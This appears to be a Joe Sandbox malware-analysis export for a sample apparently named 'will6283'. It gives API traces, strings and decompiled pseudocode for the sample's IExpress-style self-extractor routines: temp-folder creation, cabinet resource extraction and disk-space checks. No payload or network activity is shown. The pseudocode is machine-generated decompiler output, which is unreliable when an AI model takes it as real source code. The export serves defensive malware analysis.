Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010656B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0106571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01065737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010657CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010657EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01065802

Part of subcall function 01062630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01062654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01065830

Part of subcall function 01066517: FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
Part of subcall function 01066517: LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
Part of subcall function 01066517: DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
Part of subcall function 01066517: FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01065878

Part of subcall function 0106597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010659A8
Part of subcall function 0106597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010659AF

Strings

<None>, xrefs: 01065632
RUNPROGRAM, xrefs: 010655BD, 01065600
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010656AE, 010656B3, 0106583D
msdownld.tmp, xrefs: 010657D3
A:\, xrefs: 010656F4
Z, xrefs: 0106570A

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3498133043
Opcode ID: 98c901e754a26b6299ebca39c40e9f2e79b6b9e4aeeffcc4dbf4739ee097536e
Instruction ID: 6b3fcd2eb992400e802507c55868c4a2ce7ec614a9dd9aa675e764dd4d4b98fc
Opcode Fuzzy Hash: 98c901e754a26b6299ebca39c40e9f2e79b6b9e4aeeffcc4dbf4739ee097536e
Instruction Fuzzy Hash: B4811770B042159AEB71AA389C84BFE76ADAF64384F0400A5F5C6E7191DE798EC18B50

Uniqueness

Uniqueness Score: -1.00%

Function 0106597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0106597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x1068004; // 0x19e58fb5
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x1069124 = E01066285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010644B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x1069a34 & 0x00000008;
							if(( *0x1069a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x1069a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x1069124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0106268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x1069a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10689e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x1069a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E010644B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x1069124 = E01066285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E010644B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x1069124 = E01066285();
					_t66 = 0;
					L33:
					return E01066CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0106597d
0x01065988
0x0106598f
0x0106599a
0x010659a6
0x010659a8
0x010659af
0x010659b9
0x010659dd
0x010659e4
0x010659f1
0x010659fe
0x01065a0b
0x01065a13
0x01065a19
0x01065a1b
0x01065ba1
0x01065baf
0x01065bbd
0x01065bd8
0x01065bde
0x01065be3
0x01065bec
0x01065bf0
0x01065bfc
0x01065c02
0x01065c02
0x01065c02
0x01065c04
0x01065c04
0x00000000
0x01065c04
0x01065a27
0x01065a3a
0x01065a46
0x01065a48
0x01065a4a
0x00000000
0x00000000
0x01065a64
0x01065a6a
0x01065a6c
0x01065abc
0x01065ac2
0x01065ac9
0x01065aca
0x01065aca
0x01065acc
0x01065acc
0x01065acf
0x01065ad1
0x00000000
0x00000000
0x01065ad3
0x01065ad6
0x01065ad8
0x00000000
0x00000000
0x01065ada
0x01065adc
0x01065add
0x01065add
0x01065ae0
0x00000000
0x00000000
0x00000000
0x01065ae0
0x01065ae2
0x01065ae4
0x01065ae6
0x01065ae6
0x01065ae6
0x01065ae9
0x01065aeb
0x01065af0
0x01065af6
0x01065af8
0x01065af9
0x01065af9
0x01065afb
0x00000000
0x00000000
0x01065afd
0x01065aff
0x01065b00
0x01065b03
0x00000000
0x00000000
0x00000000
0x01065b03
0x01065b05
0x01065b08
0x01065b20
0x01065b27
0x01065b52
0x01065b52
0x01065b5b
0x01065b62
0x01065b6b
0x01065b6d
0x01065b76
0x01065b7d
0x01065b83
0x01065b7f
0x01065b7f
0x01065b7f
0x01065b6f
0x01065b72
0x01065b72
0x01065b85
0x01065b98
0x01065b9e
0x01065b87
0x01065b8f
0x01065b8f
0x00000000
0x01065b85
0x01065b29
0x01065b33
0x00000000
0x00000000
0x01065b35
0x01065b48
0x01065b4a
0x00000000
0x01065b4a
0x01065b0f
0x01065b16
0x00000000
0x01065b16
0x01065a7c
0x01065a8a
0x01065aa5
0x01065aab
0x00000000
0x010659bb
0x010659c0
0x010659c7
0x010659d1
0x010659d6
0x01065c05
0x01065c14
0x01065c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010659A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 010659AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01065A13
MulDiv.KERNEL32(?,?,00000400), ref: 01065A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01065A64
memset.MSVCRT ref: 01065A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01065A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01065AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01065BFC

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 4f6f75118076e57558074a3c62321102331bee4462e9d74afb4dde93f8a86712
Instruction ID: bdffdd46e96ca1536e3e447e83b38c039a17080f59459ccb56f628c391979702
Opcode Fuzzy Hash: 4f6f75118076e57558074a3c62321102331bee4462e9d74afb4dde93f8a86712
Instruction Fuzzy Hash: 127182B1A0020DAFEB65DF64CC85BFB77ACEB48384F0440A9F586D7144DA359E858F60

Uniqueness

Uniqueness Score: -1.00%

Function 01064FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E01064FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x1069144 = E0106468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x1069140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x1068584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x1068584, 0x841), 5);
				}
				_t10 = E01064EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E01064CA0, E01064CC0, E01064980, E01064A50, E01064AD0, E01064B60, E01064BC0, 1, 0x1069148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x1069148; // 0x0
						_t24 =  *0x1068584; // 0x0
						E010644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x1061140, 0, E01064CD0, 0, 0x1069140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x1068584; // 0x0
					E010644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x1069140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x1069140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x10691d8; // 0x0
						if(_t47 == 0) {
							E010644B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x1068a38 & 0x00000001) == 0 && ( *0x1069a34 & 0x00000001) == 0) {
						SendMessageA( *0x1068584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x01064fe0
0x01064fe6
0x01064ff9
0x0106500d
0x01065013
0x0106501a
0x01065163
0x01065163
0x01065020
0x01065027
0x01065037
0x01065051
0x01065051
0x01065057
0x0106505e
0x010650a7
0x010650ad
0x010650b4
0x010650e8
0x010650e8
0x010650ee
0x010650ff
0x01065104
0x01065106
0x00000000
0x01065106
0x010650cd
0x010650d3
0x010650da
0x00000000
0x00000000
0x010650dd
0x010650e6
0x00000000
0x00000000
0x00000000
0x01065060
0x01065060
0x01065070
0x01065075
0x01065107
0x01065107
0x0106510e
0x01065111
0x01065117
0x01065117
0x0106511f
0x01065121
0x01065127
0x01065135
0x01065135
0x01065127
0x01065141
0x01065159
0x01065159
0x00000000
0x0106515f

APIs

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01064FFE
LoadResource.KERNEL32(00000000,00000000), ref: 01065006
LockResource.KERNEL32(00000000), ref: 0106500D
GetDlgItem.USER32(00000000,00000842), ref: 01065030
ShowWindow.USER32(00000000), ref: 01065037
GetDlgItem.USER32(00000841,00000005), ref: 0106504A
ShowWindow.USER32(00000000), ref: 01065051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01065111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01065159

Strings

CABINET, xrefs: 01064FE6, 01064FF7
*MEMCAB, xrefs: 010650C7

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 275d9b4381fcb7337b0bd681d24622a464f46d9397645747337abd531cedfc8c
Instruction ID: c33928d6e14f7d0a6e0e53ab57df87ea9c21cc57487bb752d9cc99adc3aeaa41
Opcode Fuzzy Hash: 275d9b4381fcb7337b0bd681d24622a464f46d9397645747337abd531cedfc8c
Instruction Fuzzy Hash: AD31E7B0740315FFE7706A66AD89F673ADCA744B99F044019F9C1EF199DA7E8C408760

Uniqueness

Uniqueness Score: -1.00%

Function 010644B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E010644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x1068004; // 0x19e58fb5
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x1068a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x1069a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E01061680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0106171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0106171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0106681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E010667C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0106681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E010667C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E01066CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x010644b9
0x010644c4
0x010644cb
0x010644d8
0x010644e4
0x010644eb
0x010644ee
0x010644ef
0x010644ef
0x010644f1
0x010644f7
0x010644f8
0x0106467b
0x010644fe
0x01064509
0x01064518
0x01064525
0x01064562
0x01064568
0x01064568
0x0106456b
0x0106456b
0x0106456d
0x0106456e
0x01064572
0x01064578
0x0106457c
0x010645cb
0x01064607
0x01064607
0x0106460d
0x01064613
0x01064617
0x00000000
0x0106461d
0x01064623
0x01064626
0x01064628
0x00000000
0x01064628
0x010645cd
0x010645cd
0x010645cf
0x010645cf
0x010645d2
0x010645d2
0x010645d4
0x010645d5
0x010645db
0x010645de
0x010645e3
0x010645e9
0x010645ed
0x00000000
0x010645f3
0x010645fd
0x00000000
0x01064602
0x010645ed
0x0106457e
0x0106457e
0x01064580
0x01064580
0x01064583
0x01064583
0x01064585
0x01064586
0x0106458a
0x0106458c
0x0106458f
0x0106458f
0x01064591
0x01064592
0x0106459b
0x0106459e
0x010645a3
0x010645a9
0x010645ad
0x00000000
0x010645af
0x010645af
0x010645bf
0x0106462d
0x01064630
0x0106463d
0x0106464e
0x0106464e
0x0106463f
0x01064640
0x01064647
0x0106464c
0x00000000
0x00000000
0x0106464c
0x01064666
0x0106466d
0x0106466f
0x01064675
0x01064675
0x010645ad
0x01064527
0x0106452e
0x0106453f
0x0106453f
0x01064530
0x01064531
0x01064538
0x0106453d
0x00000000
0x00000000
0x0106453d
0x01064554
0x0106455a
0x0106455a
0x0106455a
0x01064525
0x0106468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
LocalAlloc.KERNEL32(00000040,00000065), ref: 010645A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 010645E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0106460D
MessageBeep.USER32(00000000), ref: 01064630
MessageBoxA.USER32(?,00000000,lega,00000000), ref: 01064666
LocalFree.KERNEL32(00000000), ref: 0106466F

Part of subcall function 0106681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0106686E
Part of subcall function 0106681F: GetSystemMetrics.USER32(0000004A), ref: 010668A7
Part of subcall function 0106681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010668CC
Part of subcall function 0106681F: RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,?,0000000C), ref: 010668F4
Part of subcall function 0106681F: RegCloseKey.ADVAPI32(?), ref: 01066902

Strings

LoadString() Error. Could not load string resource., xrefs: 010644E4
lega, xrefs: 01064545, 0106465A

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lega
API String ID: 3244514340-2134167237
Opcode ID: f5ecd8c38a3572379263b181c0d02a74d4c5cdae4ea5607ccd995cd06733b0aa
Instruction ID: e99ccce084810f1d4bed106a2cb9072cef635da3de61d8d2876f75c393e2fb03
Opcode Fuzzy Hash: f5ecd8c38a3572379263b181c0d02a74d4c5cdae4ea5607ccd995cd06733b0aa
Instruction Fuzzy Hash: 5451D671900216EFDB21AE28CC48BAA7BADEF85304F044195FD89F7245DB369D05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010653A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010653A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x1068004; // 0x19e58fb5
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0106171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E01061680(_t32, 0x104, _t20);
					E0106658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E01066CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x1068a20 = 1;
				goto L5;
			}

0x010653ac
0x010653b3
0x010653b9
0x010653bb
0x010653bd
0x010653bf
0x010653d1
0x010653d6
0x010653e0
0x010653e2
0x010653f5
0x010653fb
0x01065402
0x0106540b
0x00000000
0x00000000
0x01065413
0x00000000
0x00000000
0x01065415
0x01065416
0x01065427
0x0106542a
0x0106542b
0x01065434
0x01065434
0x0106543a
0x0106544c
0x0106544c
0x01065452
0x0106545a
0x00000000
0x00000000
0x0106545e
0x0106545f
0x00000000

APIs

Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010653FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065452

Strings

IXP, xrefs: 01065419
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010653B7, 010653E1, 0106541E
IXP%03d.TMP, xrefs: 010653C0

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

